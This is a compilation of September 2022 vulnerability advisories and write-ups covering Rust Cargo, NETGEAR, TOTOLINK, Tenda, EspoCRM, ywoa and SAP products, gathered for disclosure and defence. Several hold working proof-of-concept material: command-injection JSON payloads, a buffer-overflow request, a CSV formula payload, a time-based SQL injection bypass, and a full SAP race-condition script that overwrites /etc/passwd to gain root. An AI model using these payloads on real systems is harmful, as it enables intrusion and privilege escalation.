The Rust Security Response WG was notified that Cargo did not prevent extracting some malformed packages downloaded from alternate registries. An attacker able to upload packages to an alternate registry could fill the file system when Cargo downloaded the package.

The severity of this vulnerability is "low" for users of alternate registries. Users relying on crates.io are not affected.

Note that **by design** Cargo allows code execution at build time, due to build scripts and procedural macros. The vulnerabilities in this advisory allow performing a subset of the possible damage in a harder to track down way. Your dependencies must still be trusted if you want to be protected from attacks, as it's possible to perform the same attacks with build scripts and procedural macros.

## Disk space exaustion

It was discovered that Cargo did not limit the amount of data extracted from compressed archives. An attacker could upload to an alternate registry a specially crafted package that extracts way more data than its size (also known as a "zip bomb"), exhausting the disk space on the machine using Cargo to download the package.

## Affected versions

The vulnerability is present in all versions of Cargo. Rust 1.64, to be released on September 22nd, will include a fix for it.

Since the vulnerability is just a more limited way to accomplish what a malicious build scripts or procedural macros can do, we decided not to publish Rust point releases backporting the security fix. Patch files are available for Rust 1.63.0 are available [in the wg-security-response repository][patches] for people building their own toolchain.

## Mitigations

We recommend users of alternate registries to excercise care in which package they download, by only including trusted dependencies in their projects. Please note that even with these vulnerabilities fixed, by design Cargo allows arbitrary code execution at build time thanks to build scripts and procedural macros: a malicious dependency will be able to cause damage regardless of these vulnerabilities.

crates.io implemented server-side checks to reject these kinds of packages years ago, and there are no packages on crates.io exploiting these vulnerabilities. crates.io users still need to excercise care in choosing their dependencies though, as the same concerns about build scripts and procedural macros apply here.

## Acknowledgements

We want to thank Ori Hollander from JFrog Security Research for responsibly disclosing this to us according to the [Rust security policy][policy].

We also want to thank Josh Triplett for developing the fixes, Weihang Lo for developing the tests, and Pietro Albini for writing this advisory. The disclosure was coordinated by Pietro Albini and Josh Stone.

[policy]: https://www.rust-lang.org/policies/security
[patches]: https://github.com/rust-lang/wg-security-response/tree/master/patches

The Rust Security Response WG was notified that Cargo did not prevent extracting some malformed packages downloaded from alternate registries. An attacker able to upload packages to an alternate registry could fill the file system when Cargo downloaded the package.

The severity of this vulnerability is "low" for users of alternate registries. Users relying on crates.io are not affected.

Note that **by design** Cargo allows code execution at build time, due to build scripts and procedural macros. The vulnerabilities in this advisory allow performing a subset of the possible damage in a harder to track down way. Your dependencies must still be trusted if you want to be protected from attacks, as it's possible to perform the same attacks with build scripts and procedural macros.

**Disk space exaustion**

It was discovered that Cargo did not limit the amount of data extracted from compressed archives. An attacker could upload to an alternate registry a specially crafted package that extracts way more data than its size (also known as a "zip bomb"), exhausting the disk space on the machine using Cargo to download the package.

**Affected versions**

The vulnerability is present in all versions of Cargo. Rust 1.64, to be released on September 22nd, will include a fix for it.

Since the vulnerability is just a more limited way to accomplish what a malicious build scripts or procedural macros can do, we decided not to publish Rust point releases backporting the security fix. Patch files are available for Rust 1.63.0 are available in the wg-security-response repository for people building their own toolchain.

**Mitigations**

We recommend users of alternate registries to excercise care in which package they download, by only including trusted dependencies in their projects. Please note that even with these vulnerabilities fixed, by design Cargo allows arbitrary code execution at build time thanks to build scripts and procedural macros: a malicious dependency will be able to cause damage regardless of these vulnerabilities.

crates.io implemented server-side checks to reject these kinds of packages years ago, and there are no packages on crates.io exploiting these vulnerabilities. crates.io users still need to excercise care in choosing their dependencies though, as the same concerns about build scripts and procedural macros apply here.

**Acknowledgements**

We want to thank Ori Hollander from JFrog Security Research for responsibly disclosing this to us according to the Rust security policy.

We also want to thank Josh Triplett for developing the fixes, Weihang Lo for developing the tests, and Pietro Albini for writing this advisory. The disclosure was coordinated by Pietro Albini and Josh Stone.

**References**

*   GHSA-2hvr-h6gw-qrxp
*   https://nvd.nist.gov/vuln/detail/CVE-2022-36114
*   rust-lang/cargo@d1f9553
*   rust-lang/cargo@d87d57d

GHSA-2hvr-h6gw-qrxp: Cargo extracting malicious crates can fill the file system

Silicon Valley vendor tackles command injection and MitM-to-RCE issues

Adam Bannister 16 September 2022 at 16:10 UTC  
Updated: 16 September 2022 at 16:11 UTC

Silicon Valley vendor tackles command injection and MitM-to-RCE issues

Vulnerabilities in a third-party module within the firmware of NETGEAR routers and Orbi WiFi Systems could lead to arbitrary code execution on affected devices.

The component in question is FunJSQ, “a third-party gaming speed-improvement service” developed by China-based Xiamen Xunwang Network Technology, included in NETGEAR firmware images, according to a security advisory published yesterday (September 15) by European IoT security firm ONEKEY.

Now patched, the high severity flaws included an unauthenticated command injection flaw (CVE-2022-40619), and an insecure auto-update mechanism (CVE-2022-40620) that enabled manipulator-in-the-middle (MitM) attacks, potentially leading to remote code execution (RCE).

Read more of the latest hardware security news

The issues, which were both given a CVSS score of 7.7, can only be exploited if an attacker has the victim’s WiFi password or access to an Ethernet connection to the router, according to a NETGEAR advisory.

Moreover, ONEKEY indicated that FunJSQ is seemingly only enabled when the Quality of Service (QoS) feature, which prioritizes internet traffic for applications like VoIP or online gaming, is also activated.

**Insecure auto-update**

The insecure auto-update mechanism led to arbitrary code execution from the WAN interface due to a trio of issues.

First, insecure communications arose from the “explicit disabling of certificate validation (-k), which allows us to tamper with data returned from the server”, according to ONEKEY researchers.

Second, the “update packages are simply validated via a hash checksum, packages are not signed in any way”.

And finally, “arbitrary extraction to the root path with elevated privilege \[allowed\] whoever controls the update package to overwrite anything anywhere on the device (which puts a lot of trust in a third party supplier)”.

**Command injection**

The command injection issue was discovered during an investigation of , which was exposed by HTTP server .

This endpoint accepted parameters that required an authentication token generated by a weak algorithm that used a hardcoded string and the device MAC address.

The resulting token was sent to a remote FunJSQ service for validation by curl.

“We found that the curl command line is built using the value, which is user controlled and unsanitized prior to creating the full command line,” revealed the researchers.

**Coordinated disclosure**

ONEKEY reported the bug to NETGEAR on May 19, and the Silicon Valley vendor disclosed details of the flaw alongside firmware updates on September 9.

Affected router models include R6230, R6260, R7000, R8900, R9000, and XR300, while the vulnerable Orbi WiFi Systems models are RBR20, RBS20, RBR50, and RBS50.

ONEKEY said the research highlighted the supply chain threat posed by “undocumented and vulnerable software components in widely deployed embedded devices”.

The researchers urged vendors to “assure that all included third-party vendors adhere to at least the same cybersecurity standards” as their own.

YOU MIGHT ALSO LIKE WAPPLES web application firewall faulted for multiple flaws

NETGEAR resolves router vulnerabilities in bundled gaming component

In TOTOLINK T6 V4.1.5cu.709_B20210518, there is an execute arbitrary command in cstecgi.cgi.

Permalink

**Command Injection****TOTOLINK\_T6**

version: V4.1.5cu.709\_B20210518

**Description:**

There is a execute arbitrary command in cstecgi.cgi

**Source:**

you may download it from : http://www.totolink.cn/home/menu/detail.html?menu\_listtpl=download&id=16&ids=36

**Analyse:**

in sub\_421504, v6 get from mac

finally pass to v29 and execute 

**POC**

    from pwn import *
    import json
    
    data = {
        "topicurl": "setting/setStaticDhcpRules",
        "addEffect": "1",
        "mac": " ;ls > /tmp/1;:  "
    }
    
    data = json.dumps(data)
    print(data)
    
    argv = [
        "qemu-mipsel-static",
        "-g", "1234",
        "-L", "./root/",
        "-E", "CONTENT_LENGTH={}".format(len(data)),
        "-E", "REMOTE_ADDR=192.168.0.1",
        "./cstecgi.cgi"
    ]
    
    a = process(argv=argv)
    a.sendline(data.encode())
    
    a.interactive()

CVE-2022-38826: CVE/setStaticDhcpRules_1.md at main · whiter6666/CVE

Tenda RX9_Pro V22.03.02.10 is vulnerable to Buffer Overflow via httpd/setMacFilterCfg.

Permalink

**1** contributor

**Users who have contributed to this file**

**buffer overflow****Tenda\_RX9\_Pro**

version: V22.03.02.10

**Description:**

There is a buffer overflow in httpd/setMacFilterCfg

**Source:**

you may download it from : https://www.tendacn.com/download/detail-4218.html

**Analyse:**

get value from deviceList

then call sub\_4223E0

finally call strcpy ,dont check the length, cause buff overflow

**POC**

    url = "http://192.168.1.13/goform/setMacFilterCfg"
    payload = 'A'*300 + '\n'
    
    r = requests.post(url, data={'deviceList': payload})

CVE-2022-38829: CVE/setMacFilterCfg.md at main · whiter6666/CVE

TOTOLINK T6 V4.1.5cu.709_B20210518 is vulnerable to command injection via cstecgi.cgi

Permalink

**Command Injection****TOTOLINK\_T6**

version: V4.1.5cu.709\_B20210518

**Description:**

There is a execute arbitrary command in cstecgi.cgi

**Source:**

you may download it from : http://www.totolink.cn/home/menu/detail.html?menu\_listtpl=download&id=16&ids=36

**Analyse:**

in sub\_421AA0, pin get from mac ,and then v7->v16->v11->v15->v13

finally execute system

**POC**

    from pwn import *
    import json
    
    data = {
        "topicurl": "setting/setWiFiWpsStart",
        "wscMode": "1",
        "pin": " ;ls > /tmp/1;:  "
    }
    
    data = json.dumps(data)
    print(data)
    
    argv = [
        "qemu-mipsel-static",
        "-g", "1234",
        "-L", "./root/",
        "-E", "CONTENT_LENGTH={}".format(len(data)),
        "-E", "REMOTE_ADDR=192.168.0.1",
        "./cstecgi.cgi"
    ]
    
    a = process(argv=argv)
    a.sendline(data.encode())
    
    a.interactive()

CVE-2022-38828: CVE/setWiFiWpsStart_1.md at main · whiter6666/CVE

CSV Injection in Create Contacts in EspoCRM 7.1.8 allows remote authenticated users to run system commands via creating contacts with payloads capable of executing system commands. Admin user exporting contacts in CSV file may end up executing the malicious system commands on his system.

**Affected Product and Version:** EspoCRM 7.1.8

**Description**: EspoCRM is an open-source CRM (customer relationship management) software written in PHP. This web application enables users to see and manage company relationships. EspoCRM version 7.1.8 is vulnerable to CSV injection allowing authenticate users to run system commands on the end user’s system by injecting CSV payloads in the input fields while creating contacts and accounts.

**Impact:** There is no direct impact on the application. It depends on the machine/system where the victim tries to open the file. Suppose a malicious CSV file is opened on the machine attached to an organization. In that case, it will allow the attacker to gain access to the device and launch other attacks against the organization.

**Steps to reproduce:**

1\. Log in to the application as a regular user and navigate to Contacts -> Create Contacts

2\. Insert a payload (A CSV formula is used as a payload, i.e. \[=cmd|’/C notepad’!’ A1’\] in the first name and last name. Click the save button to create the contact

3\. Log in to the application as an administrator (admin user). Navigate to contacts and select the highlighted option. Click export from the actions list. Export the file in CSV format

4\. Open the downloaded file. Observe that the formula is executed, and Notepad opens up (this is a sample formula to open the Notepad, the attacker can use more advanced payloads to run exploits on the end user’s machine)

**Note**: More advanced CSV payloads can be used to run other system commands.

**Remediation:**

Update to EspoCRM 7.1.9.

CVE-2022-38844: EspoCRM 7.1.8 is vulnerable to CSV Injection - Cybersecurity@ValueLabs - Medium

ywoa v6.1 is vulnerable to SQL Injection via backend/oa/visual/exportExcel.do interface.

**Environment construction**

http://partner.yimihome.com/static/index.html#/index/sys\_env

Direct one-click installation can be started, and then login on the account admin password 1111111, login if prompted authentication expired can not log in, change the local system time can

http://172.16.140.189:8088/oa/setup/license.jsp

Once installed here, the source code is available for download at gitee

https://gitee.com/bestfeng/yimioa

Download a good local idea to open a static look at the code on

**idea**

Download: http://partner.yimihome.com/static/index.html#/index/idea\_deploy First set it up as shown here, after setting it up, import the database, after importing, you need to change the link configuration yimioa/c-core/src/main/ resources/application.properties Modify the mysql connection information, and then just start  But idea start, more bugs, and report more errors, here is idea static look at the code

**/oa/visual/exportExcel.do interface orderby injection Bypass****Vulnerability recurrence**

GET /oa/visual/exportExcel.do?code=personbasic&orderBy=id+%26%26+(/\*!%53eLEct\*/+1+FROM+(/\*!%53eLEct\*/(sleep(5)))a)&op=1&sort=desc&isMine=true HTTP/1.1
Host: 172.16.140.186:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: \*/\*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: JSESSIONID=339C404636300F5F43B74EC828919D11; skincode=lte; name=admin; pwd=p5Bx7jxXNGCCEsQLv/rG4w==; cwbbs.auth=LkPkBkEkAkNmJmHmHhEmNmHmHmPmBmPmPmOhOhKmMmMhJlDlDiGlAlMlCiDiNlIiJlIlMlMlPlNl

**bypass** poc

%26%26+(/\*!%53eLEct\*/+1+FROM+(/\*!%53eLEct\*/(sleep(5)))a)

**Code audit and function implementation**

Did not find the corresponding web function point, here is a direct look at the static code interface audit  
  
orderby, here the parameters, and then look down, because the above personnel function point that GET injection already know getModuleListSqlAndUrlStr method, so look down, directly orderby passed in  
So it causes SQL injection, if not bypass, there will be no problem, after all, the filter method has been bypassed.

CVE-2022-38808: SQL injection exists in ywoa v6.1 backend/oa/visual/exportExcel.do interface · Issue #26 · cloudwebsoft/ywoa

SAPControl Web Service Interface (sapstartsrv) suffers from a privilege escalation vulnerability via a race condition.

SEC Consult Vulnerability Lab Security Advisory < 20220915-0 >  
=======================================================================  
               title: Local privilege escalation  
             product: SAP® SAPControl Web Service Interface (sapuxuserchk)  
  vulnerable version: see section "Vulnerable /  tested versions"  
       fixed version: see SAP security note 3158619  
          CVE number: CVE-2022-29614  
              impact: medium  
            homepage: https://www.sap.com/about.html  
               found: 2022-02-24  
                  by: M. Li (Office Munich)  
                      SEC Consult Vulnerability Lab

                      An integrated part of SEC Consult, an Atos company  
                      Europe | Asia | North America

                      https://www.sec-consult.com

=======================================================================

Vendor description:  
-------------------  
"The SAP Start Service (sapstartsrv) provides basic management services for  
systems and instances and single server processes. Services include starting  
and stopping, monitoring the current run-time state, reading logs, traces and  
configuration files, executing commands and retrieving other  
technology-specific information, like network access points, active sessions,  
thread list etc. They are exposed by a SOAP Web service interface named  
"SAPControl". This paper describes how to use this Web service interface."

Source: https://assets.cdn.sap.com/sapcom/docs/2016/09/0a40e60d-8b7c-0010-82c7-eda71af511fa.pdf

Business recommendation:  
------------------------  
SEC Consult recommends to implement the security note 3158619, where the  
documented issue is fixed according to the vendor. We advise installing the  
corrections as a matter of priority to keep business-critical data secured.

Vulnerability overview/description:  
-----------------------------------  
1) Local privilege escalation (CVE-2022-29614)  
The SUID-root program sapuxuserchk erroneously follows the symbolic link to  
create a temporary local logon ticket and change the ownership of the target  
file for owner access only. As member of the group sapsys, a user can therefore  
escalate his/her privileges to root on a local Unix system by successfully  
exploiting a race condition.

Proof of concept:  
-----------------  
1) Local privilege escalation (CVE-2022-29614)  
The utility sapuxuserchk is used by sapcontrol to request a temporary local  
logon ticket in the following way. As a result, the ticket is created in the  
folder /usr/sap/SEC/D00/work/sapcontrol_logon/

$ sapcontrol -nr 0 -function RequestLogonFile user0

$ ls -l logon*  
-rw------- 1 secadm sapsys 40 Feb 25 08:58 logon0  
-rw------- 1 user0  users  40 Feb 25 09:00 logon1  
-rw------- 1 root   root   40 Feb 25 09:01 logon2

Since sapcontrol is supposed to create the ticket for any system user, it  
requires a utility with SUID bit set. The owner, group and its permission bits  
of sapuxuserchk of a standard installation are shown below.

$ ls -l sapuxuserchk  
-rwsr-x--- 1 root sapsys 1312137 Feb 28  2019 sapuxuserchk

The request originating from sapcontrol is first sent to the instance server  
sapstartsrv, piping into sapuxuserchk a 512-byte encrypted message, which  
contains the ticket path, user name and ticket in the plaintext, as an example  
shown below.

$ strings input-0-plaintext  
SAPLOGONFILE /usr/sap/SEC/D00/work/sapcontrol_logon/logon1  
  user0  
1133146902252676394602837452470900726967

On its duty to create the ticket, sapuxuserchk performs the sanity check to  
guarantee the non-existence of the file prior to the creation in the  
function internal_create_saplogon_file.

However, it introduces a race condition between the stat and open calls, as  
shown by the following excerpt from strace.

stat("/usr/sap/SEC/D00/work/sapcontrol_logon/logon1", 0x7ffc0d2e1530) = -1 ENOENT (No such file or directory)  
open("/usr/sap/SEC/D00/work/sapcontrol_logon/logon1", O_RDWR|O_CREAT|O_TRUNC, 0600) = 3  
  fchown(3, 1000, 100)

The attacker can run a race of constantly creating a symbolic link logon1  
pointing to a privileged file such as /etc/passwd and meanwhile invoke the  
SUID-root program sapuxuserchk, in the hope that the creation of the link  
take place between the stat and open calls, so that the first will fail,  
(meaning that the file does not exist yet) while the second as well as the  
ensuing fchown call succeeds. In a positive result, the attacker gains the  
read-write permission of the target file.

The following run to winning the race took 629 attempts to finally gain the  
root privilege. The PoC further below lists the exploit implementing the idea  
above with a pre-intercepted message for user secadm.

-------------------------------------------------------------------------  
sh-4.3$ id  
uid=1001(secadm) gid=474(sapsys) groups=474(sapsys),1000(sapinst)

sh-4.3$ ls -l /etc/passwd  
-rw-r--r-- 1 root root 2517 Feb 25 00:47 /etc/passwd

sh-4.3$ python3 sapmatt.py  
this many tries: 629  
[+] now login as sapmatt

sh-4.3$ su sapmatt  
Password:

sh-4.3# id  
uid=0(sapmatt) gid=0(root) groups=0(root)

sh-4.3# ls -l /etc/passwd  
-rw-r--r-- 1 secadm sapsys 73 Feb 25 10:03 /etc/passwd

$ cat sapmatt.py  
import sys, os, signal, base64, random, string

secadm_msg =   
b'O9OXlWwex4ddSI5vhXFfUQvZ8Td3NWzRNIb9QN6bHY764Z0zVNuVjFHRGhHEgYgwNQDnf0/bBwzlEXCSXFkhtiDqDohuyCxG4mtRqc86FlB6DTOjBY9o/6Cb3rRSZ58jggx71JXMRk21jW3gqdem+tmqHCnIumZjodk2cuk5/MY76dsD65s3j1XrQS0RT3gPaspl/6Yb842hbVTZXVRY3cHKzNq5tZMKB2LmyyslO4xCI00eBN6k6yEKNFLvMx8lYbAIaHcfdWu3pMWVIb9rT3BoTCHwi5hBz8dHk6usdEw05q/Xuxe28gxWCUZpN09sYsd/5R8HqqLfwyiNI7CTBCA3f+fHUweJPuteD5O8bwo/mEOShHimO1gPZzhBdow2C0JszYQeQpxgRtENXPUt2qgT7TJqmItxM0puB8ry0TnKJIbk5gj0smflBPBZyTDXl+qNUmgWL1dK/SBpTUErGMVXFVBi8bNDMSUhcJa+0IQlYSBHPln17kquqhGvlRYYZVJttDNoYcvBchc4HxHZmH5pHkD4fhbcQgFT0UFgceSH1j3sE6G/M/QM1X/vTVE4534XJ3mDcFk/brOYun1dawJ30BkJ9HbP5weihwRwspOq52qRZ9CXsnJCtFPNqNWNIe8BgQUW8WV7FkiDJ+Lpp0pq8KLlZ0Yomz46YfCHkag='  
# openssl passwd sappass  
u1_passwd = "sapmatt:wPi023oIkjHdA:0:0::/root:/bin/sh\nsecadm:x:1001:474::/tmp:/bin/sh\n"  
logon_symlink = "/usr/sap/SEC/D00/work/sapcontrol_logon/logon1"  
target_file = "/etc/passwd"

g = 1024  
if not os.path.isfile(logon_symlink):  
         os.system("touch " + logon_symlink)  
secadm_msg = base64.b64decode(secadm_msg)

msg_file = '/tmp/msg' + ''.join(random.choice(string.ascii_letters) for i in range(8))  
f0 = open(msg_file, "wb")  
f0.write(secadm_msg)  
f0.close()

pid = os.fork()  
if pid == 0:  
         j = 0  
         while True:  
                 if j > g:  
                         print('done')  
                         os._exit(os.EX_OK)  
                 j += 1  
                 os.system("/usr/sap/SEC/D00/exe/sapuxuserchk < {0} > /dev/null".format(msg_file))  
else:  
         i = 0  
         uid = os.getuid()  
         success = False  
         while not success:  
                 if i > g:  
                         print("[-] give up, link too many tries: " + str(i))  
                         break  
                 i += 1  
                 try:  
                         os.unlink(logon_symlink)  
                         os.symlink(target_file, logon_symlink)  
                         statinfo = os.stat(target_file)  
                         if statinfo.st_uid == uid:  
                                 os.kill(pid, signal.SIGILL)  
                                 print("this many tries: " + str(i))  
                                 print("[+] now login as sapmatt ")  
                                 f = open(target_file, "w")  
                                 f.write(u1_passwd)  
                                 f.close()  
                                 success = True  
                 except Exception as err:  
                         print('[-] lost the race {0}'.format(err))  
         os.waitpid(pid, 0)  
         os.unlink(msg_file)

-------------------------------------------------------------------------

Vulnerable / tested versions:  
-----------------------------  
The following version of the binary was found to be vulnerable during our tests:  
* Version: 753, patch 400, changelist 1906766

According to the vendor the following products are affected by the discovered  
vulnerability:

SAP NetWeaver AS ABAP, AS Java, ABAP Platform and HANA Database, Versions:  
* KERNEL 7.22, 7.49, 7.53, 7.77, 7.81, 7.85, 7.86, 7.87, 7.88  
* KRNL64NUC 7.22, 7.22EXT, 7.49  
* KRNL64UC 7.22, 7.22EXT, 7.49, 7.53  
* SAPHOSTAGENT 7.2

Please refer to the vendor patch day post:  
https://dam.sap.com/mac/app/e/pdf/preview/embed/ucQrx6G?ltr=a&rc=10

Vendor contact timeline:  
------------------------  
2022-02-25: Contacting vendor through vulnerability submission web form.  
2022-03-04: Vendor confirms receipt and assigns SAP security incident number  
             #2270008914.  
2022-04-29: Requesting status update.  
2022-05-05: Vendor confirms vulnerability and states it might be addressed  
             in May 2022 patch day.  
2022-06-14: Vendor releases patches with SAP security note 3158619.  
2022-06-15: Requesting the confirmation of the security note on the issue.  
2022-08-11: Vendor sends the link to the Acknowledgements to Security  
             Researchers.  
2022-09-02: Requesting the confirmation of the fix.  
2022-09-03: Vendor confirms the issue has been fixed on June Patch Day.  
2022-09-15: Public release of security advisory.

Solution:  
---------  
The following security note needs to be implemented:  
https://launchpad.support.sap.com/#/notes/3158619

Workaround:  
-----------  
You can remove the SUID-bit from sapuxuserchk as temporary mitigation.

# chmod 0755 sapuxuserchk

Advisory URL:  
-------------  
https://sec-consult.com/vulnerability-lab/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult, an Atos company  
Europe | Asia | North America

About SEC Consult Vulnerability Lab  
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an  
Atos company. It ensures the continued knowledge gain of SEC Consult in the  
field of network and application security to stay ahead of the attacker. The  
SEC Consult Vulnerability Lab supports high-quality penetration testing and  
the evaluation of new offensive and defensive technologies for our customers.  
Hence our customers obtain the most current information about vulnerabilities  
and valid recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Interested to work with the experts of SEC Consult?  
Send us your application https://sec-consult.com/career/

Interested in improving your cyber security with the experts of SEC Consult?  
Contact our local offices https://sec-consult.com/contact/  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: security-research at sec-consult dot com  
Web: https://www.sec-consult.com  
Blog: http://blog.sec-consult.com  
Twitter: https://twitter.com/sec_consult

EOF M. Li / @2022

SAP SAPControl Web Service Interface Local Privilege Escalation

SAP SAProuter suffers from an improper access control vulnerability where permitting loopback traffic can lead to unexpected behavior.

SEC Consult Vulnerability Lab Security Advisory < 20220914-0 >  
=======================================================================  
               title: Improper Access Control  
             product: SAP® SAProuter  
  vulnerable version: see section "Vulnerable / tested versions"  
       fixed version: see SAP security note 3158375  
          CVE number: CVE-2022-27668  
              impact: high  
            homepage: https://support.sap.com/en/tools/connectivity-tools/saprouter.html  
               found: 2022-02-25  
                  by: Fabian Hagg (Office Vienna)  
                      SEC Consult Vulnerability Lab

                      An integrated part of SEC Consult, an Atos company  
                      Europe | Asia | North America

                      https://www.sec-consult.com

=======================================================================

Vendor description:  
-------------------  
"SAProuter is a software application that provides a remote connection  
between our customer's network and SAP. SAProuter can be used to:

- Improve network security, e.g.by using a password or by only allowing  
   encrypted connections from known sources  
- Control and log the connections to your SAP system  
- Set up an indirect connection when programs involved cannot  
   communicate with each other due to the network configuration  
- Increase performance and stability by reducing the SAP system workload  
   within a local area network (LAN) when communicating with a wide area  
   network (WAN)" [1]

[1] https://support.sap.com/en/tools/connectivity-tools/saprouter.html

Business recommendation:  
------------------------  
SEC Consult recommends to implement the security note 3158375, where the  
documented issue is fixed according to the vendor. We advise installing the  
correction as a matter of priority to keep business-critical data secured.

Vulnerability overview/description:  
-----------------------------------  
1) Improper Access Control (CVE-2022-27668)  
According to SAP note 1853140: "in the default configuration, the  
SAProuter does not allow a route to itself. You can explicitly permit  
the 'loopback' from the SAProuter to itself using option -X".

It has been identified that under certain circumstances, this is not  
valid and may lead to unexpected behavior. External attackers having  
network-wise access to a (weakly configured) SAProuter instance can  
exploit an improper access control vulnerability by sending packets  
of type NI_ROUTE in order to establish a tunnel that allows to manage  
the SAProuter externally even when it was started without option -X.

This enables an attacker to send packets of type ROUTER_ADM in order to  
gain unauthorized access to administrative functions such as stopping  
the remote SAProuter instance, displaying connection information,  
switching trace level, or terminating a specific connection.

Proof of concept:  
-----------------  
1) Improper Access Control (CVE-2022-27668)  
For successful exploitation of this vulnerability, the following prerequisites  
must be met:

- Route permission table saprouttab must contain an entry that  
   explicitly permits external hosts to connect to port 3299 of  
   arbitrary hosts. Some examples of such entries are shown in  
   the following listing:

   P  <source-host incl. attacker-controlled machine>  *  3299  
   P  <source-host incl. attacker-controlled machine>  *  3200.3300

- SAProuter is running (option -X does not need to be set) and the  
   attacker has network-wise access to its listening port.

The vulnerability can be verified by means of the publicly available  
Python script router_portfw.py [2] of the open source pysap framework  
developed by M. Gallo. The script, which is based on a scapy re-implementation  
of the proprietary SAP Router protocol, allows for port forwarding through  
a SAProuter service.

For demonstration purposes, the following simplified lab setup is used:

-------------------------------------------------------------------------  
SAProuter (IPv4:192.168.56.103) <-----> Attacker (IPv4:192.168.56.104)  
-------------------------------------------------------------------------  
SAProuter started with option -r:  |    Pysap framework  
./saprouter -r                     |  
                                    |  
Content of saprouttab in workdir:  |  
P  192.168.56.104  *  3299         |  
-------------------------------------------------------------------------

The following listing shows that it is not possible to establish a  
"loopback" tunnel through the remote SAProuter service by specifying a  
target destination host 127.0.0.1 (option -t) and target destination  
port 3299 (option -r). As expected, this route is filtered and denied  
by default even when explicitly allowed through the route permission  
table.

--------------------------------------------------------------------------  
attacker@192.168.56.104$ python router_portfw.py -d 192.168.56.103 -p 3299  
-t 127.0.0.1 -r 3299 -a 127.0.0.1 -l 3299 -v  
[*] Setting a proxy between 127.0.0.1:3299 and remote SAP Router 192.168.  
56.103:3299 (talk mode raw)  
SAPNIProxy: Binded to address 127.0.0.1:3299, proxying to 192.168.56.103:  
3299  
Routing to 127.0.0.1:3299  
To send 61 bytes data + 4 bytes NI header  
Received 4 bytes NI header, to receive 211 bytes data  
Received 211 bytes data  
Route request to 127.0.0.1:3299 not accepted by 192.168.56.103:3299  
--------------------------------------------------------------------------

It was discovered that it is possible to circumvent this check using  
the non-standard IPv4 broadcast address 0.0.0.0 (see RFC5735, RFC1122).  
When specifying destination host 0.0.0.0 and destination port 3299,  
this leads to an effective access control bypass as can be seen in the  
following listing.

--------------------------------------------------------------------------  
attacker@192.168.56.104$ python router_portfw.py -d 192.168.56.103 -p 3299  
-t 0.0.0.0 -r 3299 -a 127.0.0.1 -l 3299 -v  
[*] Setting a proxy between 127.0.0.1:3299 and remote SAP Router 192.168.  
56.103:3299 (talk mode raw)  
SAPNIProxy: Binded to address 127.0.0.1:3299, proxying to 192.168.56.103:  
3299  
Routing to 0.0.0.0:3299  
To send 59 bytes data + 4 bytes NI header  
Received 4 bytes NI header, to receive 8 bytes data  
Received 8 bytes data  
Route request to 0.0.0.0:3299 accepted by 192.168.56.103:3299

attacker@192.168.56.104$ ss -antlp | grep "3299"  
LISTEN 0    5  127.0.0.1:3299  0.0.0.0:*  users:(("python",pid=1985,fd=3))  
--------------------------------------------------------------------------

Once the tunnel is established, an attacker can leverage administrative  
functions using its local port 3299 which is forwarded to the loopback  
interface of the remote SAProuter instance. For example, the Python  
script router_admin.py [3] of the pysap framework can be used to  
shutdown (option -s) the running SAProuter instance on the remote host.

--------------------------------------------------------------------------  
attacker@192.168.56.104$ python router_admin.py -s -d 127.0.0.1 -p 3299  
[*] Requesting stop of the remote SAP Router  
[*] Connected to the SAP Router 127.0.0.1:3299  
[*] Using SAP Router version 40  
[*] Sending Router Admin packet

netwadm@192.168.56.103$ ./saprouter -r

trcfile dev_rout  
no logging active

WARNING: wildcard character used in route target

shutdown message received, good bye ...  
--------------------------------------------------------------------------

External links:  
[2] https://github.com/SecureAuthCorp/pysap/blob/master/examples/router_portfw.py  
[3] https://github.com/SecureAuthCorp/pysap/blob/master/examples/router_admin.py

Vulnerable / tested versions:  
-----------------------------  
The following versions of the binary were found to be vulnerable during our tests:

- SAProuter as part of kernel 753 patch no. 400 (Linux, 64 BIT UNICODE)  
- SAProuter as part of kernel 777 patch no. 200 (Linux, 64 BIT UNICODE)

No additional testing on other releases has been carried out. According to the vendor  
the following releases and versions are affected by the discovered vulnerability:

- KRNL64NUC     7.49        
- KRNL64UC      7.49        
- SAP_ROUTER    7.53        
- SAP_ROUTER    7.22        
- KERNEL        7.49        
- KERNEL        7.77        
- KERNEL        7.81        
- KERNEL        7.85        
- KERNEL        7.86        
- KERNEL        7.87        
- KERNEL        7.88

Vendor contact timeline:  
------------------------  
2022-02-25: Contacting vendor through vulnerability submission web form.  
2022-03-05: Vendor confirms receipt and assigns internal ID #2270010706.  
2022-04-04: Requesting status update.  
2022-04-05: Vendor confirms vulnerability and states that a fix is already  
             complete. The corresponding security note is expected to be  
             released with the upcoming April 2022 patch day.  
2022-04-12: Patch day April 2022 passed without release.  
2022-05-10: Patch day May 2022 passed without release.  
2022-06-14: Vendor releases patch with SAP Security Note 3158375.  
2022-06-14: Requesting confirmation that the finding was fixed by the  
             published security note as no prior notification was provided.  
2022-06-28: Vendor confirms that the patch included in Security Note 3158375  
             fixes the issue. The vulnerability got assigned CVE-2022-27668.  
2022-09-14: Release of this security advisory.

Solution:  
---------  
The vendor provides a patched version which should be installed immediately.  
The software can be obtained via the SAP service marketplace. Further  
information can be found in the corresponding Security Note 3158375 [4].

[4] https://launchpad.support.sap.com/#/notes/3158375

Workaround:  
-----------  
Remove any wildcard (*) values in the target host or IP address directive  
in route permission table saprouttab entries 'P' and 'S'. In general, it  
is recommended to not make use of any wildcard values in the route permission  
table saprouttab. Additional information on the secure configuration of  
SAProuter can be found in SAP Security Note/KBA 1895350 [5].

[5] https://launchpad.support.sap.com/#/notes/1895350

Advisory URL:  
-------------  
https://sec-consult.com/vulnerability-lab/

